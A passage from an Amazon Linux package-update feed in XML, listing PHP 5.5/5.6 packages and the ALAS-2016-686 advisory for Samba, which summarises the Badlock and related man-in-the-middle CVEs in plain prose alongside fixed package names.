version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.19" release="1.123.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-enchant-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package 
name="php56-snmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.33" release="1.113.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package 
name="php55-pgsql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.33" release="1.113.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.33-1.113.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.19" release="1.123.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.19-1.123.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.19" release="1.123.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-soap-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" 
version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-pgsql" 
version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.33-1.113.amzn1.i686.rpm</filename></package><package 
name="php56-pspell" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.33" release="1.113.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-xml-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.33" release="1.113.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.33-1.113.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.19-1.123.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.19" release="1.123.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.19-1.123.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-686</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-686: critical priority package update for samba</title><issued date="2016-04-13 11:45:00" /><updated date="2016-04-13 11:45:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2118:
A protocol flaw, publicly referred to as Badlock, was found in the Security Account Manager Remote Protocol (MS-SAMR) and the Local Security Authority (Domain Policy) Remote Protocol (MS-LSAD). Any authenticated DCE/RPC connection that a client initiates against a server could be used by a man-in-the-middle attacker to impersonate the authenticated user against the SAMR or LSA service on the server. As a result, the attacker would be able to get read/write access to the Security Account Manager database, and use this to reveal all passwords or any other potentially sensitive information in that database.
1317990:
CVE-2016-2118 samba: SAMR and LSA man in the middle attacks
CVE-2016-2115:
It was found that Samba did not enable integrity protection for IPC traffic by default. A man-in-the-middle attacker could use this flaw to view and modify the data sent between a Samba server and a client.
1312084:
CVE-2016-2115 samba: Smb signing not required by default when smb client connection is used for ipc usage
CVE-2016-2114:
It was discovered that Samba did not enforce Server Message Block (SMB) signing for clients using the SMB1 protocol. A man-in-the-middle attacker could use this flaw to modify traffic between a client and a server.
1312082:
CVE-2016-2114 samba: Samba based active directory domain controller does not enforce smb signing
CVE-2016-2113:
It was found that Samba did not validate SSL/TLS certificates in certain connections. A man-in-the-middle attacker could use this flaw to spoof a Samba server using a specially crafted SSL/TLS certificate.
1311910:
CVE-2016-2113 samba: Server certificates not validated at client side
CVE-2016-2112:
It was found that Samba&#039;s LDAP implementation did not enforce integrity protection for LDAP connections. A man-in-the-middle attacker could use this flaw to downgrade LDAP connections to use no integrity protection, allowing them to hijack such connections.
1311903:
CVE-2016-2112 samba: Missing downgrade detection
CVE-2016-2111:
It was discovered that Samba configured as a Domain Controller would establish a secure communication channel with a machine using a spoofed computer name. A remote attacker able to observe network traffic could use this flaw to obtain session-related information about the spoofed machine.
1311902:
CVE-2016-2111 samba: Spoofing vulnerability when domain controller is configured
CVE-2016-2110:
Several flaws were found in Samba&#039;s implementation of NTLMSSP authentication. An unauthenticated, man-in-the-middle attacker could use this flaw to clear the encryption and integrity flags of a connection, causing data to be transmitted in plain text. The attacker could also force the client or server into sending data in plain text even if encryption was explicitly requested for that connection.
1311893:
CVE-2016-2110 samba: Man-in-the-middle attacks possible with NTLMSSP authentication
CVE-2015-5370:
Multiple flaws were found in Samba&#039;s DCE/RPC protocol implementation. A remote, authenticated attacker could use these flaws to cause a denial of service against the Samba server (high CPU load or a crash) or, possibly, execute arbitrary code with the permissions of the user running Samba (root). This flaw could also be used to downgrade a secure DCE/RPC connection by a man-in-the-middle attacker taking control of an Active Directory (AD) object and compromising the security of a Samba Active Directory Domain Controller (DC).
1309987:
CVE-2015-5370 samba: crash in dcesrv_auth_bind_ack due to missing error check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5370" title="" id="CVE-2015-5370" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2110" title="" id="CVE-2016-2110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2111" title="" id="CVE-2016-2111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2112" title="" id="CVE-2016-2112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2113" title="" id="CVE-2016-2113" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2114" title="" id="CVE-2016-2114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2115" title="" id="CVE-2016-2115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2118" title="" id="CVE-2016-2118" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.10" release="6.33.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.10-6.33.amzn1.noarch.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" 
release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.10" release="6.33.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.10-6.33.amzn1.noarch.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.2.10" release="6.33.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-libs-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.10" release="6.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.10-6.33.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="6.33.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-common-tools-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.10" release="6.33.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.10-6.33.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.10" 